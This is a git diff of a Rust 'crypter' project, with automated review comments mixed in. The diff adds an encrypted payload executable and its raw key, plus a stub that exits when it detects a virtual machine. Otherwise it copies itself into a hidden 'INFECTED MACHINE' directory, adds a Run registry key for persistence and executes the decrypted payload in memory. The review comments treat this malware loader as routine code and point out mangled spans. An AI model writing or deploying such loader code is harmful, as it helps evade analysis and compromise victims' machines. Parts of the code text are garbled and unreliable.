diff --git a/crypt/hexowl.exe b/crypt/hexowl.exe
new file mode 100644
index 0000000..b1022a0
Binary files /dev/null and b/crypt/hexowl.exe differ
diff --git a/crypt/src/main.rs b/crypt/src/main.rs
index 74db37d..881c1e4 100644
--- a/crypt/src/main.rs
+++ b/crypt/src/main.rs
@@ -11,7 +11,7 @@ use rand::{RngCore, SeedableRng};
 fn main() -> std::io::Result<()> {
     // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder
-    let plaintext_bytes = read("example.exe").expect("Failed to read file");
+    let plaintext_bytes = read("hexowl.exe").expect("Failed to read file");
     let mut encrypted_file = File::create("encrypted_Input.bin")?;
     let mut key_file = File::create("key.txt")?;
diff --git a/stub/Cargo.lock b/stub/Cargo.lock
index ceaeab3..d420e74 100644
--- a/stub/Cargo.lock
+++ b/stub/Cargo.lock
@@ -4,9 +4,9 @@ version = 3
 [[package]]
 name = "aes"
-version = "0.8.2"
+version = "0.8.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "433cfd6710c9986c576a25ca913c39d66a6474107b406f34f91d4a8923395241"
+checksum = "ac1f845298e95f983ff1944b728ae08b8cebab80d684f0a832ed0fc74dfa27e2"
 dependencies = [
  "cfg-if",
  "cipher",
@@ -31,9 +31,9 @@ dependencies = [
 [[package]]
 name = "cpufeatures"
-version = "0.2.7"
+version = "0.2.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3e4c1eaa2012c47becbbad2ab175484c2a84d1185b566fb2cc5b8707343dfe58"
+checksum = "a17b76ff3a4162b0b27f354a0c87015ddad39d35f9c0c36607a3bdd175dde1f1"
 dependencies = [
  "libc",
 ]
@@ -75,9 +75,9 @@ checksum = "3518e289386082220db48c380f414722e25263af4160f8577c247dae0c6f3829"
 [[package]]
 name = "libc"
-version = "0.2.144"
+version = "0.2.147"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2b00cc1c228a6782d0f076e7b232802e0c5689d41bb5df366f2a6b6621cfdfe1"
+checksum = "b4668fb0ea861c1df094127ac5f1da3409a82116a4ba74fca2e58ef927159bb3"
 [[package]]
 name = "memexec"
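Review bot: The comment directly above the changed line still tells the reader to rename `example.exe`, while the call now reads `"hexowl.exe"`, so as of this hunk the comment and the code disagree. Either update it to name the file that is actually read, e.g. `// Read the input file ("hexowl.exe" in this "crypt" folder) into a vector`, or keep the comment generic and move the filename into a named constant so the two cannot drift apart again. The remainder of `main` (the writes to `encrypted_Input.bin` and `key.txt`) continues outside the hunk.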
@@ -92,6 +92,7 @@ dependencies = [
  "aes",
  "inside-vm",
  "memexec",
+ "winreg",
 ]
 [[package]]
@@ -105,3 +106,34 @@ name = "version_check"
 version = "0.9.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f"
+
+[[package]]
+name = "winapi"
+version = "0.3.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
+dependencies = [
+ "winapi-i686-pc-windows-gnu",
+ "winapi-x86_64-pc-windows-gnu",
+]
+
+[[package]]
+name = "winapi-i686-pc-windows-gnu"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
+
+[[package]]
+name = "winapi-x86_64-pc-windows-gnu"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
+
+[[package]]
+name = "winreg"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "16cdb3898397cf7f624c294948669beafaeebc5577d5ec53d0afb76633593597"
+dependencies = [
+ "winapi",
+]
diff --git a/stub/Cargo.toml b/stub/Cargo.toml
index 0800fd5..799735d 100644
--- a/stub/Cargo.toml
+++ b/stub/Cargo.toml
@@ -8,4 +8,5 @@ edition = "2021"
 [dependencies]
 inside-vm = "0.2.0"
 aes = "0.8.2"
-memexec = "0.2"
\ No newline at end of file
+memexec = "0.2"
+winreg = "0.9"
diff --git a/stub/src/encrypted_Input.bin b/stub/src/encrypted_Input.bin
new file mode 100644
index 0000000..37e2087
Binary files /dev/null and b/stub/src/encrypted_Input.bin differ
diff --git a/stub/src/key.txt b/stub/src/key.txt
new file mode 100644
index 0000000..aa11f4f
--- /dev/null
+++ b/stub/src/key.txt
@@ -0,0 +1 @@
+8Ç­Ò¯F éL¨OÃXþ
\ No newline at end of file
diff --git a/stub/src/main.rs b/stub/src/main.rs
index 6ae5b90..8dcd45e 100644
--- a/stub/src/main.rs
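Review bot: The key.txt hunk checks the raw AES key bytes into the repository in the same directory as `stub/src/encrypted_Input.bin`, so the encryption gives no confidentiality against anyone who holds the repository or the built stub; presumably the key is compiled into the stub alongside the ciphertext, in which case the payload is recoverable by straightforward inspection of the binary, and what this provides is obfuscation rather than protection. The rendered line (`8Ç­Ò¯F éL¨OÃXþ`, with `\ No newline at end of file`) also indicates the key is stored as non-UTF-8 bytes in a file with a `.txt` extension, and text-mode tooling that normalises encodings or line endings can silently corrupt such a file, which is a correctness risk for whatever reads it. Secret material does not belong in version control; that this key sits next to its ciphertext is the point to record for anyone reviewing this commit.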
+++ b/stub/src/main.rs @@ -3,16 +3,30 @@ use aes::cipher::{BlockDecrypt, KeyInit, generic_array::GenericArray, }; use inside_vm::inside_vm; -use std::io::{Read, Cursor}; +use std::process::Command; +use std::{fs, env}; +use std::io::{Read, Cursor, self}; use std::io::Result; +use std::path::Path; +use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS}; +use winreg::RegKey; -fn main(){ +fn main() { + if inside_vm(){ + println!("This is in a vm"); + std::process::exit(0); + } else { + println!("NO VM"); + + create_infected_directory(); + persistence(); + let pe_bytes = decrypt_file().unwrap(); fileless(pe_bytes); } 
@@ -45,7 +59,52 @@ fn decrypt_file() -> Result> {
     Ok(decrypted_bytes, )
 }
-fn fileless(bytes: Vec){
+fn create_infected_directory() -> io::Result<()> {
+    let infected_dir = Path::new("C:/Rust Crypter - INFECTED MACHINE");
+    fs::create_dir_all(&infected_dir)?;
+
+    let current_exe = env::current_exe()?;
+    let current_exe_filename = current_exe
+        .file_name();
+
+    let infected_exe_path = infected_dir.join(current_exe_filename.unwrap());
+    fs::copy(¤t_exe, &infected_exe_path)?;
+
+    if cfg!(target_os = "windows") {
+        Command::new("attrib")
+            .arg("+h")
+            .arg(infected_dir.as_os_str())
+            .output()?;
+        Command::new("attrib")
+            .arg("+h")
+            .arg(infected_exe_path.as_os_str())
+            .output()?;
+    }
+
+    Ok(())
+}
+
+fn persistence() -> io::Result<()> {
+
+    if let Ok(current_exe) = env::current_exe() {
+        if let Some(file_name) = current_exe.file_stem() {
+
+            let executable_name = file_name.to_string_lossy();
+            let directory_path = "C:/Rust Crypter - INFECTED MACHINE/";
+            let file_path = format!("{}{}.exe", directory_path, executable_name);
+
+            // Open the "Run" registry key
+            let hkcu = RegKey::predef(HKEY_CURRENT_USER);
+            let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?;
+
+            // Add the executable path to the "Run" registry key
+            run_key.set_value("RustCrypter", &file_path).err();
+        }
+    }
+    Ok(())
+}
+
+fn fileless(bytes: Vec) {
     unsafe {
         memexec::memexec_exe(&bytes).unwrap();
     }
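Review bot: `create_infected_directory` and `persistence` are added without doc comments, and their host-side effects are exactly what an incident responder reading this file needs spelled out: the first copies the running executable into `C:/Rust Crypter - INFECTED MACHINE` and spawns `attrib +h` twice to hide the directory and the copy, the second opens `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` and writes a value named `RustCrypter` pointing at that copy. Give each a `///` comment stating the directory it creates, the registry key and value name it writes, and the child processes it launches, so the artifacts this code leaves on a machine are documented next to the code that produces them. Several spans in this hunk look like extraction damage rather than source — `Result>`, `Vec)` and `fs::copy(¤t_exe, …)` presumably read `Result<Vec<u8>>`, `Vec<u8>` and `&current_exe` in the actual file — so the text here should not be taken as what the compiler saw. `fileless` continues past the end of the hunk.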